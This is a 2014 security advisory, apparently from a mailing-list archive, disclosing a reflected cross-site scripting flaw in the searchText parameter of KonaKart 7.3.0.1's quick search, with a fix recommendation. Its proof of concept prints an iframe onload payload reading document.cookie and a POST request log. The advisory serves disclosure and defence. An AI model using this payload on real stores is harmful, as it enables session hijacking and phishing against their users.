[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Konakart v7.3.0.1 CMS - CS Cross Site Web Vulnerability



Document Title:
===============
Konakart v7.3.0.1 CMS - CS Cross Site Web Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1362


Release Date:
=============
2014-12-04


Vulnerability Laboratory ID (VL-ID):
====================================
1362


Common Vulnerability Scoring System:
====================================
2.4


Product & Service Introduction:
===============================
If you are a retailer and looking for a product to develop an on line store, then KonaKart could be a good match. 
Regardless of your size, KonaKart will provide a powerful solution that should cover most, if not all of your 
requirements, delivering unparalleled price / performance.

One of the differentiation factors of KonaKart is that all functionality is available through a set of APIs (POJO, 
JSON, SOAP, RMI, JavaScript). These APIs are great for integration, allowing you to seamlessly merge eCommerce 
functionality into existing web sites and to connect to back end systems through well defined interfaces. A common 
problem with eCommerce systems is the cost for upgrading as new versions of the eCommerce platform are released. 
KonaKart has solved this problem through the use of APIs which remain backwards compatible as new versions of 
KonaKart are released. This means that regardless of the complexity of your store-front customizations you can 
easily upgrade to the latest version; saving you time and money.

(Copy of the Vendor Homepage: http://www.konakart.com/product/is-konakart-for-you )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Konakart v7.3.0.1 CMS.


Vulnerability Disclosure Timeline:
==================================
2014-12-04:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
DS Data Systems (UK) Ltd.
Product: KonaKart - Content Management System (Web-Application) 7.3.0.1 (Linux, Windows & Multi OS Platform)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A non persistent cross site scripting web vulnerability (client-side) has been discovered in the official Konakart v7.3.0.1 web-application.
The issue allows an attacker to inject own script code as payload to the application-side of the vulnerable online service function or module.

The client-side cross site scripting web vulnerability is located in the searchText values of the QuickSearch.action POST method request. 
Remote attackers are able to inject own malicious persistent script code inject in the search function POST method request. The attacker is 
able to prepare a malicious links to steal user/admin session data. The request method to inject the code is POST and the attack vector is 
located on the client-side of the vulnerable online-service application.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module context.

Request Method(s):
					[+] POST

Vulnerable Module(s):
					[+] Search > Advanced Search

Vulnerable Function(s):
					[+] QuickSearch.action

Vulnerable Parameter(s):
					[+] searchText

Affected Version(s):
					[+] KonaKart-7.3.0.1 - Windows
					[+] KonaKart-7.3.0.1 - Linux
					[+] KonaKart-7.3.0.1 - Linux-Install-64 & KonaKart-7.3.0.1.zip (Multiple Platforms)


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account with low or medium user interaction. 
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploit
<div id="item-overview" class="item-area wide rounded-corners">
<div class="item-area-header"></div>
<div class="items-message">
No products were found for your search of <b>">[CS SCRIPT CODE EXECUTION!]<iframe src="./evil-source" onload="alert(document.cookie)" <<="" b=""> .
Click on any of the following suggestions to retry:
<div class="spelling-suggestions">
<ul><li><a href="QuickSearch.action?searchText=onboard&searchInDesc=true" class="text-link"><span>onboard</span></a></li>
<li><a href="QuickSearch.action?searchText=apart&searchInDesc=true" class="text-link"><span>apart</span></a></li></ul>
</div></div><div class="item-area-footer"></div>
</div>		


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:80/konakart/QuickSearch.action 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:80/konakart/Welcome.action]
      Cookie[JSESSIONID=1DAFFD83F4BB0BE342DDF81449CD4B73; __utma=86225154.1264352723.1415816157.1415816157.1415816157.1; 
__utmb=86225154; __utmc=86225154; __utmz=86225154.1415816157.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); 
CUSTOMER_UUID=9c1951a2-b41c-4e27-b80f-7123f693c223; PHPSESSID=dmq03hr0d6frmi93bvucab8m71; __atuvc=1%7C46; __atuvs=5463a5f0d42aad60000; y_cookie=702]
      Connection[keep-alive]
   POST-Daten:
      xsrf_token[null]
      searchText[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28document.cookie%29+%3C]
      manuId[]
      catId[]
   Response Header:
      Date[Wed, 12 Nov 2014 18:33:33 GMT]
      Server[Apache/2.2.22 (CentOS)]
      Cache-Control[no-cache, no-store]
      Pragma[no-cache]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html;charset=UTF-8]


Reference(s):
http://localhost:80/konakart/
http://localhost:80/konakart/Welcome.action
http://localhost:80/konakart/QuickSearch.action


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the searchText value in the advanced search POST method request.
Encode also the search results output to prevent client-side script code injection attacks.


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability is estimated as medium. (CVSS 2.4)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx 	- research@xxxxxxxxxxxxxxxxxxxxx 	       		- admin@xxxxxxxxxxxxxxxxx
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
PGP KEY: http://www.vulnerability-lab.com/keys/admin@xxxxxxxxxxxxxxxxxxxxx%280x198E9928%29.txt